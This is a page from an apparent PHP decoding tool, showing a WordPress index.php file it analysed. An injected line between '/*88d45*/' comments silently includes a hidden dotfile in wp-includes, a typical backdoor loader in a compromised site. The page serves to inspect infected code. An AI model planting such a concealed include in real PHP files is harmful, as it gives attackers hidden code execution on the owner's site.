Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php /*88d45*/ @include ("/var/www/html/wp-includes/html-api/.d7c17b9d.otc"); /*88..

Decoded Output download

<?php 
/*88d45*/ 
 
@include ("/var/www/html/wp-includes/html-api/.d7c17b9d.otc"); 
 
/*88d45*/ 
/** 
 * Front to the WordPress application. This file doesn't do anything, but loads 
 * wp-blog-header.php which does and tells WordPress to load the theme. 
 * 
 * @package WordPress 
 */ 
 
/** 
 * Tells WordPress to load the WordPress theme and output it. 
 * 
 * @var bool 
 */ 
define( 'WP_USE_THEMES', true ); 
 
/** Loads the WordPress Environment and Template */ 
require __DIR__ . '/wp-blog-header.php'; 
 ?>

Did this file decode correctly?

Original Code

<?php
/*88d45*/

@include ("/var/www/html/wp-includes/html-api/.d7c17b9d.otc");

/*88d45*/
/**
 * Front to the WordPress application. This file doesn't do anything, but loads
 * wp-blog-header.php which does and tells WordPress to load the theme.
 *
 * @package WordPress
 */

/**
 * Tells WordPress to load the WordPress theme and output it.
 *
 * @var bool
 */
define( 'WP_USE_THEMES', true );

/** Loads the WordPress Environment and Template */
require __DIR__ . '/wp-blog-header.php';

Function Calls

None

Variables

None

Stats

MD5 e574cf8075df0c62e8fbf1c56ec903b4
Eval Count 0
Decode Time 59 ms